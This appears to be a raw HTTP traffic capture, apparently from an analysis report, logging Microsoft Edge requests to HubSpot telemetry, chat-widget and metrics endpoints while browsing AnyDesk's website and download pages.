access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 17
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: db4b64fa-9d15-4362-9d68-8146569a34bf
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-qc8tk
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: db4b64fa-9d15-4362-9d68-8146569a34bf
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=7PB9mGdLoRuya2SZQm4gGeOXjjSgBy6kcJvPxlig4TY-1728144474-1.0.1.1-FYWcf7D9AB9BqVIKuiQ7G5ys7n985TkJEuPWDLSvu1jQPvcI4jLMAu3nKso4.BUwcXCVEMjLgKhySxfl8L9qNg; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZQ7xZ07xeCM95TMa9IzgxTSi1QHClDIrN43TeaucrQsrOQwRop1mEB0h3JQfptK8C7UbKVGv7VyO%2FK7eoPjwkiIgeF4Rc2B%2BFNpTSxskqz7u%2B1Zr9Kx7PSaStfNFPNg7jc0VkevLvg%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=Ft.mpy6_wPNq6OwrHY8ZoPF1Yw7OfsDRRpIt0zvJ2pg-1728144474416-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaad43d030bad-AMS
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2318
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:54 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 22
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 21dab887-86c2-43c9-a3d3-6f86e40d908e
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-f56vg
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 21dab887-86c2-43c9-a3d3-6f86e40d908e
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=fljcyKGKi6CpQFJgsWfUtXVZZNYDY.oxZSrZ9bscABs-1728144474-1.0.1.1-WHN3e1vo92v0.1O84C.YvkPaxUDuHTtKX3NhTIfEOaRSbEBehyKPRU0uejFSd0QSXYPLVG8E9nYboEL.JBGGEQ; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dC96bITp4hwIIy84QfhnKvrd%2B2qPyCRnoix28%2FWUO51aKkY4aayEKAFGxvftusN4nkwiQbM2oQKKxHulMW0umcAVtYhb%2BP6%2BVcSiX9JNzkiX2UHQ8P1w232ceeUJvHnTkTo1sD74S%2FQ%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=s2E1sDZMqN36VmOist.ZHKy3Pr_S8hr3g4KQ_h4YR2E-1728144474525-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaad43d020bad-AMS
POST

https://app.hubspot.com/api/cartographer/v1/ipl

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/ipl HTTP/2.0
host: app.hubspot.com
content-length: 2807
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:07:54 GMT
cf-ray: 8cdeaad6d8440bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=aa831865-4e7c-4e85-8051-5695318939fa
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: aa831865-4e7c-4e85-8051-5695318939fa
set-cookie: __cf_bm=27lEdKJLQ_ChXqUJcWdapkStXTSGRGUBaRZyMALDtrQ-1728144474-1.0.1.1-ABNxx60_HBfPWR_QydnW49asbb9Y7cmbUFmhcdqayfvPEwTQY_3oqp5u.7NZysNOhY7JYoxNu2nY9uVfKOk5hg; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qB5ErW2D%2Fq9J%2B%2BuodjMYT%2Bc12rHbdbQyVPRCwTRVoBPqPtlAuU27%2FbYnQEw1nmXLPrJfITmRM4jclyCkEu4nVlR2ViQ8BWw729%2FEcGeHwhNOTXpj9Us4xZwPqaQJXN3Pww%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=YbjuBNyOOIBjuu6MqTsSjO776HFDaxSTI.3GVF7HjyI-1728144474828-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 329
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/8893101b35bc4d91b27a3a37f6a31415?uuid=9fdc7cd13e7b49d8bb94679511f5d87c&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=&domain=anydesk.com&inApp53=false&messagesUtk=8893101b35bc4d91b27a3a37f6a31415&url=https%3A%2F%2Fanydesk.com%2Fen&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:07:54 GMT
cf-ray: 8cdeaad708740bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=c5a3f2cd-8fb6-436f-bbad-c1d3c9e143a4
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: c5a3f2cd-8fb6-436f-bbad-c1d3c9e143a4
set-cookie: __cf_bm=1fe8GJ77euF26Fwz3oiTpgQfOpcn7yc2GmOVvDNb5kg-1728144474-1.0.1.1-1SzaUl8iuloFfSn8gq3tbT8C3cc_PNejpLaeYrtaLq3rIhXbWL1kDtEFh3WAI0dOX7v2uY8vooegACzMJ31y4Q; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sGQetyuafF6RgkNFYjn5KFBDoyglYz9jrJnIoYKzCILDN8ECdwGdi2rqTdLRr%2FKWlrvA%2Fqw7XoBPBZt54vPtPZ7fIMAscv42%2FOroV2DC%2F6JQtmjI6IXzCLaNstFX0Inrbw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=uALiK0E.l9bpbzIgFFOd3gbhrZlxSdKpy.bYYAIYIKA-1728144474843-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626 HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 1983
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:07:54 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 11
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 945bad23-fd3d-49e8-b0db-0ce2344a4f6e
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-vjlg7
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 945bad23-fd3d-49e8-b0db-0ce2344a4f6e
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=aV9Uad_n.FWUTeS2frZo60u7X9TCFRhpKIE0Y6uSm3M-1728144474-1.0.1.1-zCBHQCwxdSKoSPmnu7.lhGXhxPiGK2S0eMWBP2GyYyq5jW7CeGzzB3.mJDVrO3q9ydBEl5bDwXlDhOvAc2bTlw; path=/; expires=Sat, 05-Oct-24 16:37:54 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCSMe3%2FOEB%2BW%2Bm8y9jXkAlU626%2Bmp1FcKxabKV31zyXY7kpeLniypeK4Pw9dg0krwDkw2tGfM1L%2FIA%2BUPXqkLlfkzq6kqGlr2bPo5fJEDnPz8qg6wLrpvchfSO2xxFvZu1MPCY8FRQLMSb5k"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=Q97ekZk_njtoh8mEV7fKSy16zXZR12r7EUtXgQ3goSw-1728144474923-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeaad789050bad-AMS
GET

https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&referrer=https%3A%2F%2Fanydesk.com%2Fen

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&referrer=https%3A%2F%2Fanydesk.com%2Fen HTTP/2.0
host: cta-service-cms2.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:04 GMT
content-type: application/json;charset=utf-8
vary: origin
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent
access-control-allow-credentials: true
x-content-type-options: nosniff
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: OPTIONS, GET
access-control-max-age: 180
cache-control: max-age=0, no-cache, no-store
x-robots-tag: noindex, follow
x-envoy-upstream-service-time: 11
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 532f3cf9-b591-46e8-9fcc-8931bb239cf7
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-5485db5487-npl4k
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 532f3cf9-b591-46e8-9fcc-8931bb239cf7
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=agvMwqFHFb7doN05G6yN8ed0zQeroybgy0PuKxqqp2I-1728144484-1.0.1.1-TrSbxDFEvdfbd8IgJo.99JxeJyLx33gYL5y2jwwWfvb3mGsltwLKT3ENUHRj5TD6eUJbfu_hPqeplKmjfzk5Ug; path=/; expires=Sat, 05-Oct-24 16:38:04 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2pp%2BXmQjE0nRaiCTOMa461qymYyXdxx1cCwXeSycLF0Jh7HlU81W0%2FiPt0vsNLWb6gcd34Pjv9kqVkJOP6nk7c%2F1a0NPRjhZ6MQuNdJDfHJBJKLda16uUaH%2F35fHQA721Vm6VmASkGgqBkDNoUU%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=gmb6R9U0uuKd2hNQCiKbcmKMcolwwxNYPouD71XtBns-1728144484698-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab142bd20bad-AMS
content-encoding: br
OPTIONS

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=db7c004362b043ef83c4525605f064de&traceId=db7c004362b043ef83c4525605f064de&referrer=https%3A%2F%2Fanydesk.com%2Fen

msedge.exe

Remote address:

104.16.117.116:443

Request

OPTIONS /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=db7c004362b043ef83c4525605f064de&traceId=db7c004362b043ef83c4525605f064de&referrer=https%3A%2F%2Fanydesk.com%2Fen HTTP/2.0
host: api.hubspot.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-hubspot-messages-uri
origin: https://anydesk.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:04 GMT
content-type: text/plain; charset=utf-8
content-length: 18
cf-ray: 8cdeab146c4f0bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
allow: HEAD,GET,OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: 9568bd45-f110-4bf2-9bfd-6161b05f20e8
set-cookie: __cf_bm=lV.TzBW7ngFA8yGjyWa9VuQkGA0tw3EsiCZwpSp_rqA-1728144484-1.0.1.1-nyJhJljrSZn8RhSRMCT1oSigcHanwao3bDlPq61be0w_w_mwEyPDBKdtFKFh_bmZ0CnNYL74iw8e23xwICX.9g; path=/; expires=Sat, 05-Oct-24 16:38:04 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJdt54bvlNpdNWeQgh8EIePRfYTQ7DjaDNV%2B1wjYdo%2BdjA9DrkxE8vHKDQjRWN4KZ4KctuUBp3%2FtEPRgbZhEnib%2BIatCHWnD%2FPA%2BqkZS1i7yHbwHSr9sktLCResYjutIPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=iwAxWlA9yQ2mCCp0v0vWU9moxoRKClVAo4HJ1UsyEaE-1728144484702-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.1.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: cta-service-cms2.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:07 GMT
content-type: application/json;charset=utf-8
vary: origin
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent
access-control-allow-credentials: true
x-content-type-options: nosniff
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: OPTIONS, GET
access-control-max-age: 180
cache-control: max-age=0, no-cache, no-store
x-robots-tag: noindex, follow
x-envoy-upstream-service-time: 9
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: ee7a1885-ca81-42c8-a05b-b49c44c87d96
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-5485db5487-j45xs
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: ee7a1885-ca81-42c8-a05b-b49c44c87d96
cf-cache-status: DYNAMIC
